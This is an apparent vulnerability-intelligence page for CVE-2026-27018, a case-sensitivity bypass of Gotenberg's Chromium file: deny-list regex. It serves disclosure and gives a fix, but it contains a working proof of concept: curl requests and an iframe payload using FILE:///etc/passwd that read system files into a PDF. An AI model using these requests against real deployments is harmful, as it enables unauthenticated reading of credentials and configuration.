Deploy autonomous AI agents that reason, exploit, and validate complex vulnerability chains — not another scanner, an agentic system that thinks like a senior pentester.
CVE-2026-27018 is a low severity vulnerability with a CVSS score of 0.0. No known exploits currently, and patches are available.
Very low probability of exploitation
EPSS predicts the probability of exploitation in the next 30 days based on real-world threat data, complementing CVSS severity scores with actual risk assessment.
The fix introduced in version 8.1.0 for GHSA-rh2x-ccvw-q7r3 (CVE-2024-21527) can be bypassed using mixed-case or uppercase URL schemes.
The default --chromium-deny-list value is ^file:(?!//\/tmp/).*. This regex is anchored to lowercase file: at the start. However, per RFC 3986 Section 3.1, URI schemes are case-insensitive. Chromium normalizes the scheme to lowercase before navigation, so a URL like FILE:///etc/passwd or File:///etc/passwd bypasses the deny-list check but still gets resolved by Chromium as file:///etc/passwd.
The root cause is in pkg/gotenberg/filter.go — the FilterDeadline function compiles the deny-list regex with regexp2.MustCompile(denied.String(), 0), where 0 means no flags (case-sensitive). Since the regex pattern itself doesn't include a (?i) flag, matching is strictly case-sensitive.
This affects both the URL endpoint and HTML conversion (via iframes, link tags, etc.).
docker run --rm -p 3000:3000 gotenberg/gotenberg:8.26.0 gotenberg
/etc/passwd via the URL endpoint using an uppercase scheme:curl -X POST 'http://localhost:3000/forms/chromium/convert/url' \
--form 'url=FILE:///etc/passwd' -o output.pdf
Open output.pdf — it contains the contents of /etc/passwd.
Alternatively, create an index.html:
<iframe src="FILE:///etc/passwd" width="100%" height="100%"></iframe>
Then convert it:
curl -X POST 'http://localhost:3000/forms/chromium/convert/html' \
-F '[email protected]' -o output.pdf
/etc/passwd contents.Please cite this page when referencing data from Strobes VI. Proper attribution helps support our vulnerability intelligence research.
Mixed-case variants like File:, fILE:, fiLE: etc. all work as well.
pkg/modules/chromium/chromium.go defines the default deny-list as ^file:(?!//\/tmp/).*pkg/gotenberg/filter.go compiles this with regexp2.MustCompile(denied.String(), 0) — flag 0 means case-sensitivepkg/modules/chromium/events.go uses FilterDeadline to check intercepted request URLs against the deny-listFILE:///etc/passwd becomes file:///etc/passwd after the deny-list check has already passedChange the default deny-list regex to use a case-insensitive flag:
(?i)^file:(?!//\/tmp/).*
Or apply case-insensitive matching in FilterDeadline when compiling the regex.
This is effectively the same impact as CVE-2024-21527 — unauthenticated arbitrary file read from the Gotenberg container. An attacker can leak environment variables, configuration, credentials, and other sensitive data.